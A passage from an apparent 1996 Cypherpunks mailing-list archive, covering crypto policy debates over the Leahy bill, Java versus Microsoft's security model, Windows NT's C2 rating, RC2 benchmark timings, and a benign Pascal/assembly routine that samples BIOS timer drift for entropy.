can send another student in his place.  If anyone is interested, please
mail him (not me) at tew2@cornell.edu.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 22 Mar 1996 04:05:35 +0800
Subject: No Subject
Message-ID: <QQahyn06899.199603210622@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain





Tim Fulbright <100022.3167@compuserve.com>
>I think you or someone here recently remarked  the U.S.Government has the only
>_real_ capability to wage world  terrorism on the internet, and after I read
>Frank Sowa's  feb. Boardwatch article I'm beginning to wonder.   I suppose
>quoting the article at length will be at least as good as some of the other
>traffic around here... just in case anybody missed it, Sowa reviewed 35 federal
>reports, and quotes Page saying "As a result, we've had no choice but to create
>an offensive capability in cyberspace.  I can't discuss it ... However, you'd
>feel good and feel safe and secure if you knew about it"  (yeah, really)
>Further, Sowa reports the Natl Defense U is forming an elite Information Corps,
>'a F0rce whose scope is to fight the battles of "Information Warfare from the
>Pentagon war room to the home PCs" according to DOD' (p90-92).... And further,
>RAND corp is using an "all out cyberwar simulator at their research center in
>Santa Monica" and... oh well,  the whole article is just crammed with stuff!
>Yikes!   I would sure like to know what people think about it. thanks.

there  seems to be a lot of hyperventilating in the military arena
about "information warfare" lately. I find it rather strange and 
incomprehensible. there are two chief areas that this frenzy seems
to be in response to:

1. propaganda/espionage areas.
2. hacking. (i.e. breaking in, crashing, etc.)

as for (1), I don't know what the fuss is about. what it suggests to
me is that there are branches of government that take "psyops" (psychological
operations) extremely seriously and are very intent on setting up camp
in cyberspace & the internet, and have probably already done so.

it is as if they are deathly terrified of the ability of individuals
to communicate not only with other individuals but other masses through
web pages and email. I find it quite frightening how many people in
our government have the mindset that "free communication can be a very
dangerous thing." personally I think an application for government
should reject anyone that hasn't memorized the entire bill of rights..

but the recent Strassman & Marlow paper on remailers, which addressed (1),
seemed a bit incomprehensible and bordered on unintelligible.
they talked as if remailers are like weapons that can be fired on
an enemy. (huh???)  either they are deep into psyop or spook psychology, or 
they just don't "get it" that remailers are pretty harmless. I 
tend to believe it is a little of both.

(2) is definitely something to take very seriously. if you want to
learn about how/why infiltrating computers is incredibly appealing
to many in the government, check out info on "danny casolaro" and
Inslaw PROMIS software.

the behind-the-scenes theme to a lot of this is that our massive
cold war apparatus is bored and listless now that the Soviet bogeyman
is gone and they are just moving into new territories to continue
to suck up billions of dollars.

but its awfully hard to read the various scrambled entrails that have
been emerging such as the Leahy bill, Strassman & Marlow paper, etc. in
relation to info warfare-- I tend to think some of it is just 
evidence that there are some amazingly addled people in our government.

BTW I like "boardwatch" mag, read it regularly, 
and highly recommend it to anyone as one of the better & more 
quality cyberspace mags. try www.boardwatch.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 15:05:00 +0800
Subject: No Subject
Message-ID: <QQahyo07802.199603210634@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


AO on MS response to Java:

>As a web developer, I have some problems with this scheme.  Giving Microsoft
>access to virtually every OLE control on the Web does not make me more
>secure.  Sounds like a way to rip off ideas from the rest of the development
>world.  If someone has a control that might compete with a Microsoft
>product, it could be shelved and/or delayed for "further security testing".
>
>Java has a decentralized mechanism for security.  No one group controls what
>is a "certified" control and what is not.  You write the code and compile it
>and that is that. Furthermore, you are not stuck with Microsoft approved
>platforms.  (I wonder if there will ever be a version of Explorer for the Mac.)
>
>I expect the Microsoft plan to garner a bit of resistance from the Web
>development community over this one...

I think this is a very good example of why nobody should bemoan Java.
when it was first introduced I heard a lot of grouching and sniping
at this really outstanding software (that was admittedly overhyped).
but look what we could have gotten as the first potential standard:
the above system.

MS was apparently caught completely off guard with Java. they had not a clue 
about what it was about, why it was important, and scrambled to deal with it.
they have apparently only reluctantly licensed it as a temporary ploy.
the above motions suggest they ultimately want to control this standard.

all the MS responses to Java outside of licensing it appear to me to
be pathetically missing the point. they don't seem to understand why
Java is so important, namely its decentralized security model you 
refer to. you cannot create this by adding a few function calls on
top of an already insecure language like Visual Basic.
it has to be done incredibly carefully from the ground up as it was
done with Java. I don't think people realize how carefully this language
was constructed, it was developed extremely delicately in a way unlike
many other languages. this is a real breakthrough in software that 
theoretically creates a "secure" programming environment, something that 
has been sought for decades and is now being delivered to the desktop due
to some very hard work and visionary effort.

I noticed that Denning, in her Leahy protest letter, 
referred to glowingly of this MS "endorsement" scheme. I have
a very bad suspicion that MS is like a dog that rolls over whenever
the NSA comes to visit them and tell them how to write their software
(apparently this happens routinely).

anyway, I totally agree with you that their centralized scheme is
really horrible, and its inferiority and headaches are likely to
be spotted and yowled about by many developers as you write.

 there is no probably no need to fear MS's schemes at the moment. as long
as they have an inferior standard its not going to gain much attention
or use and Java already has a very intense momentum going. just because
MS does something in some area is not necessarily reason to take them
seriously. they have had situations where they come out with stuff
that never turns into anything and silently evaporates like all 
companies have. (far less than others, but nonetheless)

one thing I just don't really understand about MS is their seeming
drive to conquer every market. it seems that whenever a new software
market emerges they feel they have to invade it and dominate it
like pirates. this has a lot to do with the psychology of Bill Gates.
the idea that "gosh, somebody else has already done that really well,
and it would be awfully tought to beat them, let's not bother with
that" seems to be lost in that environment completely. instead, it
is, "oh no!! they are beating us!! we have to make a better widget
or we'll all die!!" -- a good example of competition taken to 
extremely unhealthy extremes imho. 

I suspect like others that MS'
glory days are receding and in fact all extremely large companies
may undergo major shifts once our economy fully shifts into the
information age.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 21 Mar 1996 18:50:17 +0800
To: coderpunks@toad.com
Subject: PC: Using BIOS Wait function as a source of entropy?
Message-ID: <199603210649.BAA27694@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



In some older versions of the NOISE.SYS random driver I experimented 
with calling the BIOS Wait function which uses the CMOS timer to 
pause, using the "drift" between timing differences.  There appears 
to be some variation here, but I don't have enough documentation (and 
have yet to hack with the BIOS myself) to figure out what goes on 
exactly when one calls Int 15h/AH=86h, so I don't know if this is 
"real" clock drift of if the variation is caused by somehting else 
unsuitable for an RNG.

Still, it seems interesting.

Does anyone have decently detailed tech specs for this function?

Source is enclosed below for reference.  No copyrights on it.

  ---Rob <WlkngOwl@unix.asb.com>

----- Attachment begins here -----

{$F-}
const
  timer0 = $40;
  timercntl = $43;

  WaitInterval = 977;

function SampleTimerWord: Word; assembler;
asm
  mov	al, 0c2h
  out	timercntl, al {	Latch status and count for timer 0 }
  in	al, timer0  { Get status word }
  test	al, 2	    { Remember mode 2 v. mode 3 for later }
  mov	ch, al
  in	al, timer0  { Get count low byte }
  mov	ah, al
  in	al, timer0  { Get count high byte }
  xchg	ah, al
  jz	@GotSample  { If mode 2, skip this last bit...}
  add	ch, ch	    { Top bit of status	byte into CF}
  rcr	ax, 1	    { Shift data down and accumulate}
  @GotSample:
end;

function Sample: Integer; assembler;
asm
{ From Ralph Brown's Interrupt List:
--------B-1586-------------------------------
INT 15 - BIOS - WAIT (AT,PS)
 AH = 86h
 CX:DX = interval in microseconds
Return: CF clear if successful (wait interval elapsed)
 CF set on error or AH=83h wait already in progress
     AH = status (see #0390)
Note:	the resolution of the wait period is 977 microseconds on most
systems
   because most BIOSes use the 1/1024 second fast interrupt from the
   AT real-time clock chip which is available on INT 70
SeeAlso: AH=41h,AH=83h,INT 1A/AX=FF01h,INT 70
}
        call SampleTimerWord
        push ax
        xor  cx, cx
        mov  dx, WaitInterval
        mov  ah, 86h
        int  15h
        jnc  @NoError        { does this affect timings much? }
        xor  ax, ax
        jmp  @Abort
@NoError:
         call SampleTimerWord
         pop  bx
         sub  ax, bx
@Abort:
end;

begin
{ Note: repeated/rapid calls to Sample() crashes the system or causes
BOUND
  interrupts (which triggers the Print Screen function on PCs). }
  WriteLn(Sample:6);
end.
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 15:22:22 +0800
Subject: No Subject
Message-ID: <QQahyp09028.199603210648@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Brad Shantz wrote:

| I have  been working for some time on a project that involves doing 
| proactive file authorization/authentication under Windows NT.  In the 
| process, I've been working on an extension to the Kernel layer of the 
| operating system because we need to be able to catch read/writes to 
| the disk.  (All perfectly legal according to the DDK, just 
| ot documented worth a damn.)  All of this is designed to work 
| directly with the functionality given to us by the NT-Security layer.
| 
| Basically, I'm now questioning the C2 rating of Windows NT.  The 
| entire security layer is  modular to the Kernel.  As a modular 
| driver, it can be removed, rewritten, and replaced.   
| 
| So, what makes it secure?  What gives it the C2 Rating?  How would 
| one go about getting a C2 rating?

	A C2 rating means that they have some audit trail mechanism,
and some means of authentication.  Basically, you read the Orange
book, spend a few million bucks, and get a C2 rating.  Ask MS if their
rating is valid after you add an ethernet card.  (The answer is no.  A
system is certified for a particular set of hardware & software.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Thu, 21 Mar 1996 22:53:35 +0800
To: bshantz@nwlink.com
Subject: Re: NT's C2 rating
In-Reply-To: <199603202119.NAA26183@montana.nwlink.com>
Message-ID: <9603210453.aa08928@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


> Basically, I'm now questioning the C2 rating of Windows NT.  The 
> entire security layer is  modular to the Kernel.  As a modular 
> driver, it can be removed, rewritten, and replaced.   

Good questioning.
 
> So, what makes it secure?  What gives it the C2 Rating?  How would 
> one go about getting a C2 rating?

The fine print says its insecure as soon as its connected to a network. 
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dirsec <unicorn@schloss.li>
Date: Thu, 21 Mar 1996 20:55:59 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Leahy Bill: Conspiracy, or Predictable Legislation?
In-Reply-To: <m0tzbcX-00092pC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960321040318.14126G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Mar 1996, jim bell wrote:

> Likewise, nobody on "our side" has made the fact of their input known, 
> whether or not that input did any good. The question, therefore, is "Who 
> knew what and when?"  Who was consulted?  What were their objections?  What 
> objections weren't satisfied?  Since the bill at least superficially 
> addresses some of our concerns, SOMEBODY must have told Leahy what we want.  
> Who?

Leahy had his own opinions about the issues to begin with.  Leahy has taken 
an interest in all these matters since and before the Clipper hearings.
Your fault here is assuming that "we" are the only ones who know anything 
about the crypto issue.  "We" represent only a portion of those in the 
field who know what they are talking about.

John Podesta is a good example.  Podesta could care less what anyone on 
this list has to say, but he was fairly key in designing DigiTel 
clauses, and was deeply involved in development of Clipper as well.  Podesta 
knows the issues without being on this list at all.  Now how exactly it 
was that you came to the conclusion that someone told Leahy "what we 
want" (as if there was some meaning to "we" and, accordingly, as if 
"what we want" could even be defined) is a bit of a mystery to me.  

Legislators are not the morons you seem to take them for.  This is 
conspiracy buff flaw #1:  (There is a huge and silent set of people who 
think exactly as I do.  Because they are not heard, they must be 
oppressed or made to be silent).

Being a member of the cypherpunk list is not a requirement to know the 
issues.  Part of your problem is basic arrogance.  Many conspiracy buffs 
share this flaw.  The legislator's staff (who are paid quite handsomly 
to be in the know, and often hired based on their expertise in the first 
place) don't really need much help in pinning down the issues.  This is 
why I say that pointing to the legislators and yelling "they must have 
had help!  Someone in here is in cahoots with them!" is the height of 
arrogance.  (Conspiracy buff flaw #2)

Further, who cares who contributed to the bill?  Hundreds of people with 
basic roles in creating legislation are forgotten every day.  So?

> 2.  I haven't seen any analysis of this bill other than Peter Junger's, even 
> and especially from some people and organizations that originally came out 
> in favor of it.  If anything, those people would be expected to be defending 
> their positions, but they've not backed up that early support with anything 
> close to a believable position.  (Most are silent.)   The implication is 
> that they had no such early analysis done, and came out in favor of the bill 
> anyway.  Worse, they aren't correcting their position based on the more 
> detailed study that has been done subsequently. 

I'm lazy.  But if someone sends me the bill in full via e-mail, I'll do 
an analysis for the list.

> 3.  Because she's a negative barometer,  Denning knows that a positive 
> review by her would be as close as she could do to give the "kiss of death" 
> to this bill.  Her putative opposition is, therefore, far more interesting 
> to us.  If anything, it gives us a marvelous opportunity to ensure the death 
> of a bad bill.

I disagree.  If Denning wasn't in on the development of the bill to begin 
with, then how is it you think she is going to be crowned with some 
glowing mystical authority when she does or does not complain?  Even 
assuming she was given such authority, negative barometer to who?  
Denning is well respected in the field by "those who matter," (a subset 
in which your "WE" seems to be poorly represented) and as such I can't 
imagine how you think that her approval would in any way be the "kiss of 
death."  This is a combination of conspiracy buff flaws #2 (arrogance: 
because "we" dislike Denning, everyone else must, or if Denning spurred 
"us" into action, the bill surely would be dead), and conspiracy buff 
flaw #3:  ("Our" "enemy" is already so demonized, they could never agree 
with us).

> I'm waiting for somebody to explain to me why we can't simply re-write the 
> Leahy bill, take out all the bad parts and put a number of new protections 
> in, and send it back to Leahy and condition our support on that edited bill. 

Ok.  Who's "we?"  (Flaw #1 all over again)  And who says that you can't 
re-write the bill?  Be my guest.  You seem to be able to type line after 
line of dribble.  One would think you'd be a good legislator.  Certainly 
for all the credit you give lawmakers, your mastery of the legislative 
process, your expertise in predicting and observing the Supreme Court, 
one would wager you're just the person.

I'm sure you'll have no trouble passing a basically liberal bill that 
the FBI will scream bloody murder about through a "law and order" 
republican congress in the middle of an election year and in the wake of 
a democratic president's public relations coup in dealing with 
international terrorism.  Sure the republicans will look soft for 
supporting the bill, but at a time like this, security is unimportant to 
them, right?

And this part I love: "and condition our support on that edited bill."  
Flaws number 1 and 2 all over again.  You think Leahy needs our support?

Go ahead, Mr. Bell.  Rewrite the bill, send it to Leahy.  Let me know 
what he says.  FDR couldn't pass a bill like that today.

> If Leahy really thinks he's doing a favor for the pro-encryption people, 
> he'll support the corrected bill wholeheartedly.  If, on the other hand, 
> it's all just a fraud, there's no hope, and in that case it's better than no 
> bill be passed than one that contains a few booby-traps that will explode 
> shortly after the bill is passed. 

Really I've never understood Leahy's position to be a strongly 
free-speech one in the first place.  While at the Clipper and 
DigiTel hearings, it was fairly clear to me that both Leahy and Specter 
were uninterested in the free speech issues, (aside a few needed sound 
bytes) and rather the stagnation of the technology sector of the U.S. 
economy through export regulation.  (The strength and growth in this 
sector and the phrase "leader in the world" was mentioned several times).  
Specter cared less so even about this at the time.  Even in a public 
hearing I recall his concern was lackluster.  Recall also that Specter 
chairs the Select Committee on Intelligence.  Hardly a free speecher in 
any shape, even though many on this list hailed him as an provisional 
ally after the Clipper hearings.

>From this perspective there is no major turn of events or dispositions 
here.  Leahy's bill, what of it I see, addresses his main concern, 
exports and U.S. technology growth.  Specter was never much on our side 
to begin with.

In many ways a lot of the attitudes from those yelling "traitors" here 
are the height of hypocracy.

"The enemy of my enemy is my friend." (of Specter and Leahy)
"Once an enemy, always an enemy." (of Denning)

The proper course to take would have started with a more accurate 
assessment of the allies of strong and unescrowed encryption.  Counting 
on Leahy and Specter was a major mistake.  Industry has always been the 
way to go (A little back patting here, I said as much at the D.C. 
cypherpunks meeting back when in the midst of Clipper, no one listened 
to me then either).  This is the reason I was so enraged with netscape.  
People listen to large, publically traded companies, most of whom are 
content to take their licks and move on right now.  Netscape was about 
the only one who could have put a foot in the door and given people a 
taste of what they were missing.

> As far as I can see, time is on our side.  Industry will continue to insist 
> on free export of encryption, and there will be few in Congress to oppose 
> it.  We already have the 1st amendment which SHOULD defend encryption, 
> unless that protection is implicitly weakened by allowing a precent for the 
> control of encryption.  In other words, we're going to win in a year or so 
> regardless of this Leahy bill, so we can afford to be hard-nosed with our 
> support or lack of it.

I find your assessment optimistic in the extreme.

I believe the concentration should be more in the direction of developing 
crypto tools that have long "half lives," stealth properties, and 
generally prepare for the regulation or ban of strong crypto without escrow.
I've called for this before, I call for it again.

Where are more effective (and multiplatform) Stealth PGP versions?  4096 bit 
RSA type keys?  256 bit conventional cyphers?

This political climate is more fear and fourhorsemen driven than anything 
else.  In the face of a democratic shift to law and order, and a 
matching republican shift even further in the same direction, the First 
Amendment, which is generally applied to public speech in any event, is 
unlikely to provide much protection here.

> Jim Bell
> jimbell@pacifier.com

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dirsec <unicorn@schloss.li>
Date: Thu, 21 Mar 1996 21:08:35 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [NOISE] Re: Dorothy Denning attacks Leahy's crypto bill
In-Reply-To: <m0tzfbg-00091AC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960321052534.14126H-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Mar 1996, jim bell wrote:

> At 03:35 PM 3/20/96 -0500, Perry E. Metzger wrote:
> 
> > Has it occurred to you that the whole thing might not be a conspiracy and that the
> >flaws in the bill might just be that -- flaws?
> >Perry
> 
> This theory is easily testable.  As I suggested a LONG time ago (gee, 
> it must be at least a week now!) let's have a go at re-writing the bill 
> to delete all the bad parts, modify it to be good, add appropriate 
> extras to nail down everything, and present it to Leahy as the minimum 
> acceptable bill.  If those are just "flaws" then Leahy should have no 
> trouble with  any of this.  If, on the other hand, it's all a fraud, 
> we'll encounter fierce resistance.
> What do you think will happen?

I think Leahy will, quite rightly, refuse to adopt the new bill because 
it has a snowball's chance in hades of passing, and it makes him look 
soft on crime and terrorists.

But I'm sure Mr. Jim "legislative expert" Bell thought of this already 
and has 10,000 characters stored in a buffer just ready to dump into a 
letter which will dismiss this most basic of explanations.

> Jim Bell
> jimbell@pacifier.com  

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 22 Mar 1996 02:22:02 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: A MODEST PROPOSAL
Message-ID: <Pine.SUN.3.91.960321065848.6659C-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Anonymous <nobody@replay.com> wrote In reference to my MODEST 
PROPOSAL:

> Ohh pleeez!!, give YOUR ravings a rest
> Next you'll be raving about soap and lampshades made out of Jews.

No, my post wasn't about Nazis, it was about the principle behind
an act attributed to the Danish King.  It was offered as an 
illustration to help explain why I was making my Modest Proposal.
Whether or not the story is a lie is irrelevant.  It was offered 
for its allogorical value.  Get a grip.

Thanks to the Cypherpunks who have signed up for the LIST OF SHAME
publicly or by private e-mail.  I will post the list soon.  I urge
anyone else who would like to be on Mr/Ms Anonymous' (Detwieler's,
Jim Bell's) LIST OF SHAME to let me know as soon as possible so 
you can be included.

I think to be fair, I should also take applications for inclusion
in a list called SUPPORTERS OF MR/MS ANONYMOUS, for those who
think he's right.

This is NOT an election, democratic vote or even a popularity
contest.  But Anonymous has made a lot of noise purportedly
speaking as and for Cypherpunks.  I'd like to see where the
consensus more truely lies on this mailing list.  Let me know.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Fri, 22 Mar 1996 04:30:51 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Dorothy Denning attacks Leahy's crypto bill
Message-ID: <199603211619.IAA27641@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:31 AM 3/21/96 -0500, dirsec wrote:
> I think Leahy will, quite rightly, refuse to adopt the new bill because 
> it has a snowball's chance in hades of passing, and it makes him look 
> soft on crime and terrorists.

Hold it:  Backup:  Opponents of the bill say it says X:  Supporters of the 
bill say it says Y:  The proposal is to rewrite the bill so it actually 
does say Y in plain english.  And you (quite correctly) say that the bill
will not pass if says Y.

You are right.

The bill does not facilitate crypto exports, it just sounds like it does, 
and it delegates judicial powers to cops.

If it was amended to facilitate crypto exports, and to maintain the 
separation of judiciary and executive, it would not pass.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Fri, 22 Mar 1996 00:10:50 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: POINTCAST - Could it be a Trojan Horse?
In-Reply-To: <199603210305.TAA26171@ix6.ix.netcom.com>
Message-ID: <Pine.SCO.3.91.960321082903.16781D-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Mar 1996, Bill Stewart wrote:

<snip>

> >     There is a new web site http://www.pointcast.com which provides a
> >     program file pcninstl.exe. You download pcninstl.exe and run the
> >     program on your PC from Windows 95 or Windows 3.1
> >
> >     PCN is a program that interfaces to the Internet using port 80 and
> >     provides you customizable up-to-the minute downloads of news
> >     headlines, stocks, customizable sports, customizable weather,
> >     customizable financial, Internet access (HTTP only with this release)
> >     and personal (horoscopes and lotteries).

IBM is also running such a service.  It's called InfoMarket and it does 
the same thing.  You load the trojan, uh.., I mean "client," onto your 
box, and then it listens to the channels for you and puts up on the 
screen the tasty bits that you want.  Of course, on a DOS box, it can 
also put all sorts of other stuff onto your computer.

And, of course, after the "trial period" you'll be charged to dine at 
their info-trough.

( InfoMarket bullshit is at http://www.infomkt.ibm.com/ )

> >     Well, Maybe it is too good to be true.  This program becomes a proxy
> >     operator for you. Downloading, through your firewall, whatever it
> >     decides should be downloaded, data, new executables, etc.  What is to
> >     prevent a hacker (or cracker if you like that term better) from
> >     offering a similar product which captures you PC keystrokes and scans
> >     your hard drive and uploads information, accesses your LAN or PC
> >     functions, or destroys PC files and data.

Thanks for the suggestions.  We'll add them to the list....

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Loysen <dwl@hnc.com>
Date: Fri, 22 Mar 1996 05:49:23 +0800
To: cypherpunks@toad.com
Subject: Re: NT's C2 rating
Message-ID: <199603211813.KAA15750@spike.hnc.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:53 AM 3/21/96 -0800, you wrote:
>> Basically, I'm now questioning the C2 rating of Windows NT.  The 
>> entire security layer is  modular to the Kernel.  As a modular 
>> driver, it can be removed, rewritten, and replaced.   
>
>Good questioning.
> 
>> So, what makes it secure?  What gives it the C2 Rating?  How would 
>> one go about getting a C2 rating?
>
>The fine print says its insecure as soon as its connected to a network. 

Ain't nothing fine about that print. An operating system or piece of
hardware may be C2 certifiable. But only a complete system in a specific
configuration can be certified as C2 compliant. The way I read the orange
book, no system with a network connection can ever be C2. For that matter a
system can't get C2 unless it is in an area where you can control and
monitor physical access to the system.

So if you can't hack it over the wire, and you can't remove, rewrite and
replace the kernel because you can't get near the keyboard what's the problem?

dwl@hnc.com		
David Loysen		
619-546-8877 x245		
			





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frederick_zarndt@novell.com (Frederick Zarndt)
Date: Fri, 22 Mar 1996 05:20:32 +0800
To: cypherpunks@toad.com
Subject: ASN.1 Tools/Compilers
Message-ID: <s1512f9a.073@fromGW>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of reliable ASN.1 tools/compilers suitable for use on a wide range
platforms?

I already know about the following tools/compilers, but I would appreciate comments
anyone cares to make:

	ISODE (who to contact for the DE?)
	Snacc

Thanks.

Frederick Zarndt
Senior Software Engineer
Novell, Inc
122 East 1700 South
Provo UT 84606
USA

Tel  801 429-3348
Fax. 801 429-3500





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 22 Mar 1996 05:37:43 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Enquirer Request
Message-ID: <9603211713.AA00912@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Would some kind soul please forward to me a copy of the latest Cypherpunk  
Enquirer?  My filter mistakenly tossed the last copy and the archive at  
hks.net is still down.


thanks,
andrew
(who should probably rewire his filter to toss messages into a temporary  
'holding tank')




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Gimon <gimonca@skypoint.com>
Date: Fri, 22 Mar 1996 05:29:06 +0800
To: cypherpunks@toad.com
Subject: Minneapolis Star Tribune this morning
Message-ID: <Pine.SV4.3.91.960321113224.9485A-100000@mirage>
MIME-Version: 1.0
Content-Type: text/plain



Mpls. Strib did a piece this morning, front page, about AltaVista,
Dejanews, etc. Well-worn territory to readers of this list. Your
words can come back to haunt you, all that stuff. One paragraph that
deserves rebuttal from those of you who are better-informed:

"Of course, technology is working on solutions to itself, but
   mechanisms that would hide the name of a message's author, such as
   cryptography and anonymous remailers, are convoluted and incomplete."

Author was Jonathan Gaw; no e-mail address given. Star Tribune Online
is at http://www.startribune.com.

 ***********************************************************************
        --The Interview--             | gimonca@skypoint.com
 George Clinton: "Suck on my soul,    | Minneapolis MN USA
 and I will lick your funky emotions!"| http://www.skypoint.com/~gimonca
 Dave Letterman: "Yuck!!"             | A lean, mean meme machine.
 ***********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 22 Mar 1996 06:43:00 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: IPG and "Free Samples"
Message-ID: <199603211947.LAA01579@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:44 PM 3/20/96 -0800, Tim May wrote:
>This may be more analogous to what IDG has done.

That's I_P_G, of course; I_D_G are the publishers of the fine
Internet Dummies' Guides, who have not yet released
"Snake Oil For Dummies" or "Cryptography For Dummies".
On the latter title, hmmmmm.....
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 21 Mar 1996 23:29:16 +0800
To: cypherpunks@toad.com
Subject: RC2 speed
Message-ID: <Pine.SOL.3.91.960321104204.26664B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Just a quick RC2 update, since I have not seen anything about it's speed 
on this list.

I have implemented RC2 from the posting from 
Message-ID: <4fk39f$f70@net.auckland.ac.nz> in sci.crypt
(This is the 'text' description of the algorithm).

The following times are from C code using gcc 2.7.0 on a sparc 20 and
cc on 'some old slow alpha box'

	     sparc 20	Alpha
rc4           4521k/s	3835k/s
des cbc        993k/s	 833k/s
des ede3 cbc   370k/s	 476k/s
idea cbc       862k/s	 726k/s
rc2 cbc        975k/s	1083k/s

Documentation I had seen previously about RC2 made the claim it was about
3 times faster than DES is software.  From my times it appears to be of a
similar speed (depending on the box).  It as has been speculated that RC2
was origionally written for effiecent implementation on 16bit hardware,
this could well be true, but for modern 32bit processors, it appears to
have no real speed advantage over DES or IDEA.

I'm mostly interested in RC2 because it is in the SSLv2 and S-MIME
specifications :-).

Any comments?

eric

PS If RC2 was implemented in assember, it would obviously be faster
   due to direct use of machine rotate instructions.  I don't quite
   know how much this would speed things up but obviously the other
   algorithms would also benifit from hand coding.
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 22 Mar 1996 07:53:01 +0800
To: cypherpunks@toad.com
Subject: Re: IPG message
Message-ID: <2.2.32.19960321204027.00942628@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


[IPG legal nonsense deleted]
>     1. The use of the word Ultima for the system, because it is 
>        impossible to have a either a more secure system - it is 
>        impossible to break the Ultima system, other equally difficult  
>        to break systems may exist, or may be formulated in the future,
